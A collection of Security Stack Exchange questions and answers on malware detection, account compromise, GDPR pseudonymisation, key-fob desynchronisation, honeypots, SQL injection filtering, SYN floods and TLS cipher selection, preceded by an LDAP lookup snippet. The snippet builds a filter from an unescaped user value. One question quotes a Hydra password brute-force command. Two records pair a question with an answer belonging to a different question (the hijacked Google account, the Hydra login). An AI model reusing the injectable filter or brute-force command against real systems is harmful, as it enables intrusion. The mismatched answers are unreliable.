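    # NB: escape 'user' with ldap3's filter-escaping helpers in real code.
    conn.search("dc=campus,dc=example,dc=edu",
                f"(userPrincipalName={user})",
                attributes=["displayName", "memberOf"])
    info = conn.entries[0] if conn.entries else None
    conn.unbind()
    return info

# print(check_credentials("jsmith", "their-password"))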
201,992 | What analysis was Bruce Schneier referencing when he wrote: Viruses have no “cure.” It’s been mathematically proven that it is always possible to write a virus that any existing antivirus program can’t stop. From the book Secrets & Lies by Bruce Schneier, page 154. | Under one possible interpretation of that, it's a result of Rice's theorem . A program is malicious if it performs some malicious action, which makes it a semantic property. Some programs are malicious and some aren't, which makes it a non-trivial property. Thus, by Rice's theorem, it's undecidable in the general case whether a program is malicious. | {
"source": [
"https://security.stackexchange.com/questions/201992",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197545/"
]
} |
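To spell out the reduction behind the answer above: a total, always-correct is_malicious decider would also decide the halting problem, which is impossible. A toy sketch; the oracle is deliberately hypothetical, because that is the point.

# Sketch of the classic reduction. Suppose someone hands us a perfect detector:
def is_malicious(program_source):      # hypothetical oracle - cannot exist
    raise NotImplementedError("no total, always-correct detector exists")

def would_halt(program_source, argument):
    # Build a program that reaches a 'malicious payload' if and only if
    # program_source(argument) finishes running. (Illustrative: assumes the
    # source defines a function called target.)
    combined = f"""
{program_source}
target({argument!r})       # run the program under test first
delete_all_files()         # payload reached only if the call above halted
"""
    return is_malicious(combined)   # deciding this decides whether target halts

# Because would_halt would solve the halting problem, is_malicious cannot be
# both total and always correct - real scanners must over- or under-approximate.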
201,994 | Recently my google account was hacked. I have 2-factor authentication turned on. 2-factor authentication was not required for the hacker to gain access to my account, nor did the hacker trigger Google's suspicious activity monitor. This is because the log in was enacted from a "trusted device" or so it seems. However, the log-in was from a location I never visited with a device name I do not know. See attached image: The hacker managed to gain access to my bank account and other various accounts without triggering any of their 2-factor authentication blocks. One more note: When the attack occurred, the device that I brought with me to Israel and then back to New York, as far as I can tell, was turned off; so it is unlikely that the hacker gained remote access to that device... but then again... maybe they did? Any idea what happened to me and how I can make sure it doesn't happen again? (They also managed to get access to my bank account, add a wire recipient (a process I usually have to verify over the phone with a human), and make a successful wire transfer... but let's stick to the Google question) For the record, I have changed all of my passwords and ran a virus scan that came out without results. But since the 2-factor authentication was enabled on literally all of my services, there wasn't much more I could do. Help! | Under one possible interpretation of that, it's a result of Rice's theorem . A program is malicious if it performs some malicious action, which makes it a semantic property. Some programs are malicious and some aren't, which makes it a non-trivial property. Thus, by Rice's theorem, it's undecidable in the general case whether a program is malicious. | {
"source": [
"https://security.stackexchange.com/questions/201994",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197537/"
]
} |
202,022 | UPDATED We have a very unique scenario: We have several old databases of user accounts. We'd like a new system to be able to connect these old accounts to new accounts on the new system, if the user wishes it. So for example, on System X you have an old account, with an old, (let's say) RPG character. On System Y you have another old account, with another RPG character on it. On our new system, with their new account, we'd like our users to be able to search these old databases and claim their old RPG characters. (Our users want this functionality, too.) We'd like to keep users' old account PII in our database for the sole purpose of allowing them to reconnect old accounts of their new accounts. This would benefit them and be a cool feature, but under GDPR and our privacy policy we will eventually need to delete this old PII from our databases. BUT - What if we stored this old PII in such a way as that it was irreversible. I.e. Only someone with the information would ever get a positive match. I'm not a security expert, but I understand that simple hashing (eg. MD5) is too far easy to hack (to put it mildly), and (technically) doesn't require "additional information" (ie. a key). The good thing about MD5 is that it's fast (in the sense that it's deterministic), meaning we could scan a database of 100,000s rows very quickly looking for a match. If MD5 (and SHA) are considered insecure to the point of being pointless, what else can we do to scan a database looking for a match? I'm guessing modern hashing, like bcrypt, would be designed to be slow for this very reason, and given that it's not deterministic means that it's unsuitable. If we merged several aspects of PII into a field (eg. FirstnameLastnameEmailDOB) and then hashed that, it would essentially become heavily salted. Is this a silly solution? | MD5 or SHA is not the concern. Hashes can be used for pseudonymization. The problem is that the hash would need to be salted (or peppered) so that data from other sources could not be used to identify the person. My email is the same everywhere. A hash of it would also be the same. So that means that, in this case, the hash and my email become synonymous. Just like a username and the legal name of a person if paired. If you use a hash in this case, you actually gain nothing in terms of GDPR. Hashing with a salt (or pepper) makes de-anonymising nearly impossible without knowing the added value. The salt (or pepper) almost becomes the token, in this case. As always, check with your DPO. | {
"source": [
"https://security.stackexchange.com/questions/202022",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1662/"
]
} |
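A minimal sketch of the salted/peppered matching the answer above points at: old-account PII is stored only as an HMAC tag under a secret pepper, so someone presenting the same details later gets a positive match, while the stored values on their own identify nobody. Standard library only; the pepper handling is simplified and the key should live outside both the database and the code.

# Sketch: pseudonymous matching of old accounts. Store only the tag; keep the
# pepper (the HMAC key) in a secrets store, separate from the database.
import hashlib
import hmac

PEPPER = b"replace-with-a-long-random-secret"    # example only - never hard-code

def claim_tag(first_name, last_name, email, dob):
    # Normalise so the same person produces the same tag later.
    material = "|".join(s.strip().lower() for s in (first_name, last_name, email, dob))
    return hmac.new(PEPPER, material.encode("utf-8"), hashlib.sha256).hexdigest()

# Migration: store claim_tag(...) per old character, then drop the raw PII.
# Claim time: recompute the tag from what the user types and look it up.
stored = claim_tag("Ada", "Lovelace", "ada@example.org", "1815-12-10")
print(stored == claim_tag(" Ada ", "LOVELACE", "Ada@Example.org", "1815-12-10"))  # True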
202,026 | My understanding of remote car key fobs, and similar security devices with rolling codes, is that the key device is a transmitter that, each time the button is pressed, sends the next secret in a known sequence that is unique to the key. It does not contain a receiver. Meanwhile, the receiver in the car tracks (for each key fob it recognises) what it expects the next secret to be, and only unlocks if it receives the correct code. There is a risk that a transmission maybe lost - e.g. the button pressed when out of range - so the receiver actually accepts any of the next few secrets in the sequence. I have heard of one system that allowed a window of up to 256, but I don't know if that number is correct and whether it is typical. If my understanding is correct, it is possible to render a key fob useless (i.e. perform a denial of service attack on the owner) by pressing the button at least 256 times while out of the range of the car. This obviously relies on access to the key fob, but not when the car is close - which is a time the user may be less vigilant. So, if a friend gets drunk in a pub, I can make sure they can't drive home by rapidly pressing their car remote 300 times while they are in the bathroom. It has always bothered me that such an attack is possible, and yet I have never heard of anyone performing it, which makes me doubt that I have understood this completely. | it is possible to render a key fob useless by pressing the button at least 256 times while out of the range of the car. Not useless, but desynchronized. Any car will allow you to re-synchronize, and one example of a typical procedure is: Turn the ignition key on and off eight times in less than 10 seconds. This tells the security system in the car to switch over to programming mode. Press a button on all of the transmitters you want the car to recognize. Most cars allow at least four transmitters. Switch the ignition off. yet I have never heard of anyone performing it You don't have any 3-year olds around? My older daughter did that... She got the garage door remote when we were putting things on the car, and after driving 10 minutes without her complaining about anything, I saw her pressing buttons on the remote... Got home to a desynchronized remote. Three-year-olds can be dangerous, relentless attackers, so take care with the physical security of your key fobs. | {
"source": [
"https://security.stackexchange.com/questions/202026",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40146/"
]
} |
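A toy model of the look-ahead window from the question above and the resynchronisation the answer mentions. It is counter-based and standard library only; real fobs derive the codes cryptographically from a per-fob secret in hardware, so treat this purely as an illustration of the window logic.

# Sketch: a receiver accepts any of the next WINDOW codes from the fob and
# jumps its counter forward on a match, so a few out-of-range presses are
# tolerated, but hundreds of them desynchronise the fob until it is re-paired.
import hashlib
import hmac

WINDOW = 256
SECRET = b"per-fob-shared-secret"   # example value

def code_for(counter):
    return hmac.new(SECRET, counter.to_bytes(4, "big"), hashlib.sha256).hexdigest()[:8]

class Receiver:
    def __init__(self):
        self.counter = 0

    def try_unlock(self, received_code):
        for step in range(1, WINDOW + 1):
            if hmac.compare_digest(code_for(self.counter + step), received_code):
                self.counter += step     # resynchronise to the fob
                return True
        return False                     # outside the window: ignored

r = Receiver()
print(r.try_unlock(code_for(3)))     # True  - a few missed presses are fine
print(r.try_unlock(code_for(300)))   # False - too many presses out of range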
202,326 | I'm working on an application that is completely built upon user interaction. In my application logs, I log each interaction and print the email address to uniquely identify which user did which interaction. This application log will not be visible to anyone other than: Me The next owner of the application if I would sell the project An administrator I might hire if the workload gets too big An example of a log record is something like this: 2019-01-24 14:27:20.954 INFO 32256 --- [whatever-info] s.p.s.t.d.m.s.SomeClassThatPrintsTheLog : Registering user with email address [email protected]. Is this allowed under GDPR or should I mask the printed email address in any way? Or use another solution? | The goal of GDPR is about protecting personally identifiable information (PII) as much as possible. The interaction of a specific user with your application are pretty sure such PII. If you really need to log this information you should inform your user about this process, i.e. the purpose of the data collection, how long the information gets stored and who gets access to the data. And you and whoever you sell the application to should never use the data for any other purpose as agreed to by the user. And of course you need to properly protect the information against misuse, i.e. use outside of the specified purpose. This specifically but not only includes if someone hacks into your application or server and steals this data. Since use of the data is limited and protection (and fines) can be costly, it might be easier to not store these information in the first place. An alternative is to at least pseudonymize the PII as much as possible, i.e. in a way that the logged data are still usable for you but that no association to a specific user can be done even when having all the logged data. But since it is not really clear what you use these logs for no recommendations can be done for a specific process of such pseudonymization. Be aware though that simply replacing each unique email address with another unique identifier might not be a sufficient pseudonymization. Depending on the data you log it might be possible to create user profiles and based on specific traits in the profiles associate these to real world users. See AOL search data leak for an example how such simple pseudonymization attempt went wrong. | {
"source": [
"https://security.stackexchange.com/questions/202326",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/197969/"
]
} |
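As a rough sketch of the pseudonymization idea in the answer above (and only a sketch: as the answer warns, replacing addresses with identifiers may still not be sufficient), a keyed hash can keep the e-mail address itself out of the log file while still letting entries for the same user be correlated. The key name, placeholder address and log format below are assumptions for the example.

import hmac, hashlib, logging

PSEUDONYM_KEY = b"keep-this-key-out-of-the-logs"  # assumption: stored and managed separately

def pseudonymize(email: str) -> str:
    # The same input always maps to the same token, so entries stay correlatable,
    # but the address never appears in the log record itself.
    return hmac.new(PSEUDONYM_KEY, email.lower().encode(), hashlib.sha256).hexdigest()[:16]

logging.basicConfig(level=logging.INFO)
logging.info("Registering user %s", pseudonymize("user@example.com"))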
202,355 | I stumbled upon this sshesame software which appears to imitate an SSH server accepting any username/password, only instead of executing the subsequent shell commands it logs them in a file. What I can't figure out is what possible use this tool might have (besides educational). As such, it only attracts unwanted attention to the server because of successful SSH login attempts, and it won't protect any other ports from being attacked (including the real SSH), so it visibly only makes the situation worse. Did I overlook something? | The reasons to have such fake SSH servers are multiple. They include such as: determining whether you’re under attack knowing the users and passwords guessed (which can display the intel the attacker has) to see attacker’s actions of interest to see attempts of exploitation of the server (might disclose 0days or backdoors) to study how the attacker tries to approach the system
and so on. They can also be used to test client software, including audit / testing / attack tools, during development (thanks to Mołot ). You should consider NOT putting up a fake SSH server on your system if you have anything of value in the server, since the fake server might be prone to vulnerabilities as well - one closed port is better than one open service . | {
"source": [
"https://security.stackexchange.com/questions/202355",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71607/"
]
} |
202,481 | I've found a little vulnerability in a web application running on a Node.js server. It works by sending a crafted payload to the application server, which makes the application server code throw an error, and due to the lack of error handling it crashes (until someone runs it again). I'm not sure what the appropriate name for this kind of attack is.
I assume it's a DOS ( Denial Of Service ) attack because it makes the server Deny Serving its clients.
On the other hand, until now I've only heard of DOS attacks which work by flooding the server in some way (which isn't the case here). So, is it correct to consider it a DOS attack?
If the answer is no, what should it be called? | Yes. Any attack whose goal is to deny the normal usage of a service by legitimate users is by definition a DoS (Denial of Service). | {
"source": [
"https://security.stackexchange.com/questions/202481",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198166/"
]
} |
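The application in the question above runs on Node.js, but the fix for this class of crash-based DoS is language independent: treat the request body as untrusted and catch failures at the handler boundary so one malformed payload cannot kill the whole process. A minimal, framework-free Python sketch of that idea (do_business_logic is a hypothetical placeholder, not code from the question):

import json

def handle_request(raw_body: bytes):
    # Any parsing or processing error becomes an error response
    # instead of an unhandled exception that crashes the server.
    try:
        payload = json.loads(raw_body)
        return 200, json.dumps(do_business_logic(payload))  # hypothetical application code
    except (ValueError, KeyError):
        return 400, '{"error": "malformed request"}'
    except Exception:
        # Log it and alert on it, but keep serving other clients.
        return 500, '{"error": "internal error"}'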
202,534 | Let's say someone has my encrypted data and he wants to decrypt it. People always talk about how the length of the key (e.g. 256 bits) decides about the entropy of the encryption, which totally makes sense. If the attacker tries all 2 256 possibilities, his great-great-…-grand-children will have my data. But what if all the years he was using the wrong algorithm? Isn't the choice of the algorithm itself adding entropy as well or am I wrong to assume this? So instead of naming my file super_secret.aes256 I would just name it super_secret.rsa256 or maybe even not give it a file ending at all? | If you’re designing a cryptosystem, the answer is No . Kerckhoffs's principle states “A cryptosystem should be secure even if everything about the system, except the key, is public knowledge.” Restated as Shannon's maxim, that means “one ought to design systems under the assumption that the enemy will immediately gain full familiarity with them.” Making the assumption that the attacker won’t learn your algorithm is security through obscurity , an approach to security that is considered inadequate. Relying on the attacker to not know the algorithm won’t add any work on his or her end, because according to Kerckhoff, he or she either knows it, or can be reasonably expected to find out. If it adds no uncertainty it adds no entropy. And their capabilities are not something you can quantify. In the case of a lost cryptosystem, like you describe, there is usually enough historic or statistical information to determine the nature of the algorithm (if not the key itself.) But you can’t design a system under the assumption that it will be lost as soon as it’s used. That’s OpSec, not cryptography. EDIT Comments have mentioned using algorithm selection as a part of the key. The problem with this approach is that the algorithm selection must necessarily be determined prior to the decryption of the data. This is exactly how protocols such as TLS work today. If you’re truly looking to mix algorithms together and use a factor of the key to determine things like S-box selection, etc., you’re effectively creating a singular new algorithm (adopting all the well-known risks that rolling your own algorithm entails.) And if you’ve created a new algorithm, then all of the bits of the key are part of that entropy computation. But if you can point out specific bits that determine algorithm instead of key material, you still have to treat them as protocol bits and exclude them. Regarding secrecy of the algorithms, your protocol may be secret today but if one of your agents is discovered and his system is copied, even if no keys are compromised the old messages are no longer using secret algorithms. Any “entropy” you may have ascribed to them is lost, and you may not even know it. | {
"source": [
"https://security.stackexchange.com/questions/202534",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198205/"
]
} |
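To quantify the point made above: even in the unrealistic best case where the attacker really does have to guess the algorithm, picking one of N plausible ciphers adds only log2(N) bits of uncertainty, which is negligible next to the key itself. The candidate count below is an arbitrary assumption.

import math

key_bits = 256
candidate_algorithms = 16   # arbitrary guess at how many ciphers an attacker would try

extra_bits = math.log2(candidate_algorithms)
print(f"hiding the algorithm adds about {extra_bits:.0f} bits")   # ~4 bits
print(f"2^{key_bits + extra_bits:.0f} vs 2^{key_bits} total work")
# And per Kerckhoffs, even those few bits cannot be relied upon.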
202,827 | We are developing a kind of social platform. It starts as a closed beta for a limited number of users, but the goal is to reach millions of subscriptions. We are currently limited on resources, both infrastructure and e.g. DevOps. So we are using GitLab for versioning our source code. Let's assume we make it and in a few years the service has a million users. How do you feel about using GitLab for versioning the source code at this stage?
Do you see it as a significant security threat? A few reasons to consider: there is no real guarantee that staff from GitLab cannot investigate the source and find security holes or some sensitive configuration. GitLab staff could sell the source code to some third party. GitLab may be forced to provide the source code to some government, without us knowing it. I know the points will sound paranoid. The purpose of the network is completely legal and ethical, but I believe any service of this kind must protect the privacy of its users. The plan is to move to our private servers later, but we have to start somehow. So, do you think it is OK to use private GitLab or Bitbucket repositories for the early phase of the project, or is it an unacceptable security threat? Disclaimer: I don't claim GitLab would do any of the things described. | Unfortunately, you are the ones responsible for deciding whether your threat model is justified or not. Therefore, we cannot simply give a definite "yes" as to whether using the platform is a security threat or not. However, there are two points that I'd like to expand on: You seem to be extremely worried about the source code containing vulnerabilities and that the disclosure of it would mean that an individual or party could identify them. Personally, I would not feel confident about providing a service to users where its security relies on the source code not being open source. To me, this is some sort of security by obscurity. In an ideal world, you want your platform to be just as solid even if the code leaks. Therefore, I would highly suggest that you partner up with some pentesters/code reviewers, or at least some developers that are very security-aware. You mention wanting to move to private versioning servers. Just do this right away and be done with it. At the risk of sounding blunt, I would question your technical skills if this seems to be a complicated or expensive step considering that you are starting off. GitLab even offers a self-hosted solution; just make sure to review the platform and to block any communications with their servers if that part worries you. Best of luck. | {
"source": [
"https://security.stackexchange.com/questions/202827",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198583/"
]
} |
202,902 | Penetration testers found out that we allow single quotes in submitted data fields, and want us to apply rules (input validation) to not allow them in any value. While I'm aware that single quotes are popular for SQL injection attacks, I strongly disagree that they should not be allowed as valid input. I am advocating for actually preventing SQL injection by means of using prepared statements (which properly quote the values) instead of filtering out anything that remotely looks like an SQL fragment. My case: Person names can contain single quotes (such as O'Reilly ) Text fields can contain single quotes (such as I'm pretty sure ) Number fields can contain single quotes ( EUR 1'000'000 ) and many more I've seen other cases where applying SQL injection prevention rules discarded valid data for the silliest reasons (name " Andreas " rejected because it contains an AND , and various common words in plain text fields being rejected because they contained the keywords " select ", " insert ", " update " or " delete "). What's the security professionals' stance on that matter? Shall we reject implementing input validation for single quotes for the reasons I stated? | You should implement input validation as a defense-in-depth method. So input validation should not be your primary defense against SQL injection; that should be prepared statements. As an additional defense you should restrict the allowed inputs. This should never ever restrict functionality. If there is a legitimate use case to have apostrophes in input, you should allow it. So you should allow single quotes in name fields, descriptions, passwords, but not in number fields, username fields, license plate fields. To block single quotes in all input is madness. This breaks functionality of the application and isn't even the correct solution against SQL injection. Consider the possibility that you misunderstood the pentesting company. If this is seriously their advice, this reflects badly on the pentesting company and I would advise you to search for a pentesting partner that helps to properly secure your software, instead of making it unusable. | {
"source": [
"https://security.stackexchange.com/questions/202902",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40685/"
]
} |
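A small sketch of the approach the answer above recommends: prepared statements as the primary defense, plus allow-list validation only for fields that genuinely have a narrow format. It uses Python's sqlite3 placeholders; the table and the licence-plate rule are invented for the example.

import re
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, plate TEXT)")

def add_user(name: str, plate: str) -> None:
    # Defense in depth: restrict fields with a narrow legitimate format...
    if not re.fullmatch(r"[A-Z0-9-]{1,10}", plate):
        raise ValueError("invalid licence plate")
    # ...but never ban apostrophes in free-text fields. The placeholder makes
    # sure O'Reilly (or any other input) is treated as data, not as SQL.
    conn.execute("INSERT INTO users (name, plate) VALUES (?, ?)", (name, plate))

add_user("Miles O'Reilly", "AB-123-CD")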
202,965 | I'm new to inspecting packets with Wireshark so this might be something very stupid on my part. That said, I don't really understand the transaction between my computer and my Roku. 17 1.129097 192.168.1.70 192.168.1.64 HTTP 248 GET /dial/com.spotify.Spotify.TVv2 HTTP/1.1 My computer is 70 and my Roku is 64. This is the entire HTTP follow: Client GET /dial/com.spotify.Spotify.TVv2 HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip
Keep-Alive: 0
Host: 192.168.1.64:8060
User-Agent: Spotify/109800078 OSX/0 (iMac18,1)
Server HTTP/1.1 404 Not Found
Server: Roku UPnP/1.0 MiniUPnPd/1.4
Content-Length: 0 I don't have anything related to Roku installed on my computer but I do have Spotify running. | It appears to be a feature called Spotify Connect . Spotify allows you to play music from you phone or computer using your Roku or smart TV, as most people will likely have better sound systems for their TVs than for their computer. Presumably your Spotify desktop app is automatically scanning your LAN and querying compatible devices to be able to offer this feature. In your case it looks like you have a compatible Roku, but the app isn't installed on it, so it returns a 404. | {
"source": [
"https://security.stackexchange.com/questions/202965",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198727/"
]
} |
203,193 | What is the purpose of using random IP addresses in SYN Flood Attack ? | A client opens a TCP connection by sending a SYN packet to a server. The server replies with a single SYN+ACK, and the client responds again with an ACK. Because of natural network latency, the server may wait a short time after sending SYN+ACK to the specified source address for an ACK reply, and this behavior is what a SYN flood exploits. Because the source address was spoofed, the reply will never come. If the server is waiting on enough fake connections that will never be completed, it will become unable to open any new connections, legitimate or not. This condition is called denial of service. SYN flood attacks do not require the attacker receive a reply from the victim, so there is no need for the attacker to use its real source address. Spoofing the source address both improves anonymity by making it harder to track down the attacker, as well as making it more difficult for the victim to filter traffic based on IP. After all, if each packet used the same source address (whether spoofed or not), any decent firewall would quickly begin blocking all SYN packets from that address and the attack would fail. | {
"source": [
"https://security.stackexchange.com/questions/203193",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/198972/"
]
} |
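A toy Python model of the half-open connection table described in the answer above, just to show why SYNs with spoofed sources that never send the final ACK crowd out legitimate clients; the backlog size and timeout are made-up numbers.

import time

BACKLOG = 128        # made-up limit on half-open connections
SYN_TIMEOUT = 30.0   # made-up number of seconds to wait for the final ACK

half_open = {}       # (src_ip, src_port) -> time the SYN+ACK was sent

def on_syn(src):
    now = time.monotonic()
    for key in [k for k, t in half_open.items() if now - t > SYN_TIMEOUT]:
        del half_open[key]                 # expire stale handshakes
    if len(half_open) >= BACKLOG:
        return "dropped"                   # legitimate clients get refused too
    half_open[src] = now
    return "SYN+ACK sent"

def on_ack(src):
    half_open.pop(src, None)               # real clients free their slot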
203,436 | I've just downloaded and executed a piece of malware on my computer. I don't have much time right now, so I just powered it off (turned it off via the Start menu), hoping that it won't be able to steal any data or do malicious activities until I can nuke it from orbit. Is it enough to prevent the malware from continuing to carry out malicious
activities? Can the malware power on my computer? Should I also unplug it and remove its battery? | TL;DR Yes, but it's unlikely. Just to be sure, either unplug the PC or ensure it can't connect to anything. Several operating systems - notably Windows 10 - have the possibility of setting " automatic wakeup ", using appropriate drivers and related, complicated hardware management. As a result, IF (and that's a big if!) a malware program has gained sufficient access to have the operating system do its bidding, it has a way to simply ask the system itself to do this on its behalf. On some systems (that the malware must be able to recognize and plan for), this holds for "true powerdown" also: additional circuitry will turn the computer on at a preselected time of the onboard Real Time Clock. In a less software-accessible manner this is available on some desktop BIOSes ("Power up automatically: [ ] Never; [ ] After power loss; [ ] Every day at a given time: : " or similar, in the BIOS setup). Then, the system will automatically power up after some time, for example at a time when you're likely to be asleep. So: there is RTC powerup hardware support, or more (integrated management systems, common on enterprise computers) the malware must already have taken control of the system, since RTC functions usually require administrator/root level access. RTC powerup HW support not present, or not used: if the malware has taken control of the system, it can have replaced the shutdown procedure with a mere going into sleep , and set up things to exit sleep mode at a later time. But did either of these options happen? Probably not. Most malware rely on being run unwittingly and being able to operate without being detected for some time. The "power off simulation" is only useful in very specific scenarios (and the hardware option is only available on comparatively few systems), and I don't think it would be worthwhile for a malware writer to worry themselves with them. They usually go with the third and easiest option: some of the usual automatic power-up or logon sequences (autoexec, boot scripts, scheduled tasks, run services and so on) is subverted so that additional code, namely, the malware, is silently run. For a "targeted" malware, designed with some specific victim in mind and tailored to the specific target's capabilities, rather than the subset available on the average infected machine, all the qualifications above wouldn't come into play. | {
"source": [
"https://security.stackexchange.com/questions/203436",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/76718/"
]
} |
203,478 | My stock Android 9.0 gives me the option of showing some short text message on the lock screen. I want to add my email address here, so people know how to contact me if they find my phone. Are there any downsides to this? The address is linked to the Google account that's used on this phone. I know there are other options for getting my phone back, like find my phone, but I want a method that allows the finder to find me instead of the other way around. | Your email address is generally public knowledge, so disclosing it is often not a big security risk. But it gets complicated when it's your phone. Because your email address is often used as your username to log into services, and you (should) use your phone as a second factor when logging in, tying those two pieces of data might have unintended consequences. Yes, you (should have already) encrypted your phone and you (should) have a strong password to log into your phone, but there are risks depending on how you implemented everything. The better option to do what you want is to display a secondary address that you do not use as a username anywhere. This is easy to do: simply forward all emails from there to your primary address. | {
"source": [
"https://security.stackexchange.com/questions/203478",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/98655/"
]
} |
203,501 | Trying for the life of me to get Hydra to work with a JSON request. General: Request URL: https://api.myapp.app/api/accounts/login/ Request Method: POST Status Code: 401 Unauthorized Remote Address: xx.xxx.xxx.xxx Referrer Policy: no-referrer-when-downgrade Response Headers: Access-Control-Allow-Methods: GET, POST Request Headers: Content-Type: application/json Origin: https://myapp.app Referer: https://myapp.app/login User-Agent: Mozilla/5.0 Request Payload: {username: "root", password: "toor"}
password: "toor"
username: "root" Response for Invalid Login: {"error":"username or password incorrect"} I have tried many iterations, but keep getting the following error message:
Receiving the following error message: [ERROR] Invalid target definition! hydra https://api.myapp.app https-form-post "api/account/login:username=^USER^&password=^PASS^:F={\"error:\" \"username \" \"or \" \"password \" \"wrong\"}" -l root -p toor | Your email address is generally public knowledge, so disclosing it is often not a big security risk. But it gets complicated when it's your phone. Because your email address is often used as your username to log into services, and you (should) use your phone as a second factor when logging in, tying those two pieces of data might have unintended consequences. Yes, you (should have already) encrypt your phone and you (should) have a strong password to log into your phone, but there are risks depending on how you implemented everything. The better option to do what you want is to display a secondary address that you do not use as a username anywhere. This is easy to do and to simply forward all emails from there to your primary address. | {
"source": [
"https://security.stackexchange.com/questions/203501",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199492/"
]
} |
203,521 | I am a security member of a small company which recently got contacted by someone claiming to be a Hackenproof member.
They were reporting on our website being indexed by googlebot (metadata, thin page content, anchor text issues) and an XSS vulnerability. We do not have any legal statement that I know of regarding VDP (vulnerability disclosure policy) yet. My questions: Basically how to proceed or even should we? (Are they legit?) What is the common expectation from a white hacker? How to validate the vulnerability? | To answer each of your questions: 1. Basically how to proceed or even should we? I recommend proceeding. You will be able to acquire valuable information that can immediately be put towards improving the security of your company. You haven't told us what the researcher has sent you, but they will either have a description of the vulnerability or methods to reproduce it. To proceed you will need from them: A description/attack scenario of the vulnerability found. Why is this an issue, what specifically does the bug allow an attacker to do that they shouldn't be able to do, what is the worst case scenario/severity of the finding. Reproduction steps. What steps could you give any engineer and allow them to reproduce the bug every time. What the hacker is looking for in return. As mentioned it may be permission to publish the finding after fixing or money. You might also want or receive remediation advice, risk scores, etc. from the researcher. VERY IMPORTANT: make it clear to the researcher that you expect them to keep the issue confidential until the issue is fixed. They may counter with a remediation window, e.g. they get to publish and article if the issue is not fixed within 60 days. This is common practice and should be acceptable to most companies with a strong security posture. 2. What is the common expectation from a white (hat) hacker? Depends on the researcher, but they will likely want permission to publish the finding once it's been fixed as well as a monetary reward. Reward prices are based on overall severity and size of the bounty program. Hackerone, a large bug bounty platform, has a matrix that suggests payouts relative to size of the company/bounty program: https://www.hackerone.com/resources/bug-bounty-basics . Determining payout price is a subtle art - I recommend searching hackerone or other bug bounty platforms for similar bugs and basing your payout on what other companies are paying for the same issue. Again - a common expectation researchers will have is that they get to publish the finding in a certain amount of time regardless of whether it's been fixed by then. 60 days is common, but I wouldn't agree to an amount of time if you're not confident your company can deliver in that window. After the issue is patched, the hacker may want to validate that the fix was implemented correctly. 3. How to validate? Use the reproduction steps the hacker has given you. They should be clear enough that any engineer can follow the steps exactly and reproduce the bug. If there are any issues here you can go back to the researcher and get clarification. It is the researchers responsibility to supply the company with reproduction steps that outline and identify the bug. Once the issue is fixed you can invite the researcher to validate the fix and ensure that it was patched completely. | {
"source": [
"https://security.stackexchange.com/questions/203521",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/199013/"
]
} |
203,684 | If a client presents a higher cipher suite during ClientHello yet eventually negotiates a lower strength cipher suite within the same protocol version, though a higher cipher suite is available on both client and server, who is responsible? According to How does SSL/TLS work? it is ServerHello which ultimately decides the cipher suite. From that post: To remember: the client suggests but the server chooses. The cipher
suite is in the hands of the server. Courteous servers are supposed to
follow the preferences of the client (if possible), but they can do
otherwise and some actually do (e.g. as part of protection against
BEAST). To understand this question better, an example is provided below. Example With Firefox: There is a Client (A) and a Server (B). Client (A) is a Firefox version 65 browser. Server (B) is a web server serving a site over https. Behavior: Connections to Server (B) @ site.server.com are being negotiated from a stronger TLS 1.2 cipher suite to a less strong TLS 1.2 cipher suite, even when a stronger cipher suite is available on both the client and the server. This behavior is confirmed on Firefox 65. Steps to Reproduce: Disable TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 and all other weaker cipher suites in Firefox then reload site.server.com The site will load with TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 . Enable TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 while leaving TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 enabled as well then reload site.server.com. The weaker cipher suite will be chosen. In this scenario, who was responsible? ClientHello or ServerHello | The client sends only what ciphers it supports in the order of their preference. The server then selects one of these ciphers - which means only the server ultimately decides which cipher gets used . It is fully up to the server which cipher suite gets selected from the offered ones, i.e. the server might take the client preferences in account but might also completely ignore it. In fact, many servers have a configuration option which allows the server to use either the cipher preferred by the client or the cipher preferred by the server. | {
"source": [
"https://security.stackexchange.com/questions/203684",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/196572/"
]
} |
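The "server chooses" behaviour described above is visible in ordinary TLS server code. A Python sketch using the standard ssl module, which both restricts the acceptable suites and tells OpenSSL to enforce the server's own preference order; the certificate file names are placeholders and the cipher string is only an example, not a recommendation.

import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("server.crt", "server.key")   # placeholder paths

# Only these suites can ever be negotiated, whatever the ClientHello offers.
ctx.set_ciphers("ECDHE+AESGCM")

# Prefer the server's ordering over the client's preference list.
ctx.options |= ssl.OP_CIPHER_SERVER_PREFERENCE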
